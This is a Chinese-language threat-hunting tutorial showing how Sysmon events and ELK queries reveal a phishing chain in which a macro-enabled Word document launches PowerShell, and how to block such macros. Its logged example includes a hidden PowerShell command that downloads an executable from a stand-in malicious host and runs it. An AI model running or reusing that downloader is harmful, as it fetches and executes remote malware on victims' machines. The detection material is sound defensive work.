用Sysmon进行威胁狩猎:发现具有宏的Word文档
导语:用Sysmon进行威胁狩猎
正如我之前所说,Sysmon是一个很好的工具,可以深入了解我们的系统中运行的数据,以及我们的端点发生了什么变化。
让我们用Sysmon对每天发生的常见事件进行一些调查,用户点击带有链接或附件的电子邮件,并打开支持宏的Word文档。
我们来分析“电子邮件”
用户将收到电子邮件的一些变体,无论它是嵌入链接还是附件。
当用户采取以下操作时,我们将看到sysmon记录的操作。我还将包括字段名称,以防您有ELK设置,以便于在您的环境中轻松搜索这些命令/进程。
您将看到捕获这些事件的以下Sysmon事件ID。
事件ID 1:进程创建:进程创建事件提供有关新创建的进程的扩展信息。完整的命令行提供了进程执行的上下文。ProcessGUID字段是跨域的此过程的唯一值,以使事件相关更容易。散列是HashType字段中的算法的完整散列。
事件ID 11:FileCreate:创建或覆盖文件时记录文件创建操作。此事件对于监视自动启动位置(如启动文件夹)以及临时和下载目录(这是常见的恶意软件在初始感染期间丢弃)的位置很有用。
事件ID 15:FileCreateStreamHash:创建命名文件流时的事件日志,它生成记录流分配到的文件(未命名流)的内容的散列的事件,以及命名流。存在通过浏览器下载删除其可执行文件或配置设置的恶意软件变体,并且此事件旨在基于浏览器捕获附加Zone.Identifier“网络标记”流的捕获。
现在我们开始分析吧:
EventID: 1 event_data.ParentCommandLine: “C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE” event_data.Image: C:\Program Files\Internet Explorer\iexplore.exe event_data.CommandLine: “C:\Program Files\Internet Explorer\iexplore.exe” https://Dcompany.life_qliwiwkwstxrkgbbz_bdfnccd&d=DwMF-Q&c=LQ_lgKiodJdZA event_data.User: PhishedUser
发生了什么? PhishedUser点击了启动Internet Explorer的Outlook的链接,并打开了以下网站:https://company.life_q…..com
2.下载Word .doc
EventID: 11 event_data.Image: C:\Program Files(x86) \Internet Explorer \IEXPLORE.EXE event_data.TargetFilename: C: \Users \PhisedUser \AppData \Local \Microsoft \Windows \Temporary Internet Files \Content.IE5 \POHSQH12 \6E713D2A.doc
(注意:日志可能显示为.tmp文件,因为日志记录时下载可能未完成)
3.打开Word文件
EventID: 1 event_data.Image:C: \Program Files(x86) \Microsoft Office \Office14 \WINWORD.EXE event_data.TargetFilename: C: \Users \PhisedUser \AppData \Local \Microsoft \Windows \Temporary Internet Files \Content.IE5 \POHSQH12 \6E713D2A.doc
发生了什么? 用户用Word 打开 6E713D2A.doc 。
4.启用宏的Word文档
EventID: 1
event_data.ParentImage: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
event_data.ParentCommandLine: “C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE” -Embedding
event_data.Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
event_data.CommandLine: powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = ‘http://Malicioussite.su/z3FRJz’.Split(‘,’);$path = $env:temp + ‘65536.exe’;foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}
event_data.User: PhisedUser
发生了什么?用户打开文档并启用宏,并运行了一个powershell命令,该命令正在尝试从http://Malicioussite.su/z3FRJz下载一个名为65536.exe的可执行文件
5.通过Powershell下载的有效载荷
event_id: 11 event_data.Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe event_data.TargetFilename: C:\Users\PhisedUser\AppData\Local\Temp\65536.exe 发生了什么? Powershell将65536.exe 下载 到 C: \Users \PhisedUser \AppData \Local \Temp
之后,可执行文件可能已经完成了多项工作,例如加密用户的文件,或者建立某种持久性。此时,您希望您在端点上记录其他操作,以确切地知道进行了哪些更改,以下是一些可以帮助您阅读的好文章(库存的未经授权的软件,检测出站连接)
现在我们知道这些事件是如何被监控的,让我们更简单地寻找这样的动作。
检测这些动作
event_data.ParentImage:office AND(event_data.Image:(wscript.exe或cscript.exe或cmd.exe或powershell.exe))
这将返回:
Microsoft产品(Word,Excel,PowerPoint)等可能会调用其他可执行文件,如下所示:
· rundll.32.exe – 通常你会看到一个事件ID 1,它涉及到outlook中的打印文档(文件>打印)或文件索引(“C:\Windows \System32 \rundll32.exe”shell32.dll,Control_RunDLL“srchadmin .DLL”)
· conhost.exe
· regsvr32.exe的
· Explorer.exe的
这里还有其他有用的查询,可以从outlook中找到“.doc”文档。
event_data.ParentImage:outlook.exe AND event_data.CommandLine:“.doc” (由Sysmon生成的事件ID:1)
event_data.Image:outlook.exe AND event_data.TargetFilename:“.doc” (由Sysmon生成的事件ID:15)
确保您检查环境中的所有内容,并确定正常的应用程序行为是什么,什么不是和修改您的查询,以确保您包括任何预期/意外的行为。
防止宏
您的用户将 继续从互联网接收.doc文档。以下是通过单词文档宏保护您的组织免受潜在恶意软件的一些方法。
1. 用户安全意识培训 – 这应该是影响您的组织的任何风险/威胁的首要任务。教你的用户要更加谨慎“停下来,点击前想想”
2. 防止和阻止宏运行通过GPO(Office 2016)。对于office 2013,您可以将办公室设置设置为“ 禁用所有具有通知或不通知的宏 ”
3. 阻止有效载荷下载 – 通过您的第7层防火墙,您可以防止为您的组织和白名单信任站点(例如,更新Microsoft,Oracle,Dell等)下载.exes。
最后说明:
· 监视所有端点日志
· 主动 – 根据过去的攻击媒介创建通知,以便您了解任何活动事件。
· 继续教育你的用户!
下一篇文章,我将介绍如何使用Sysmon事件ID:15从普通网络浏览器中查找用户下载的文件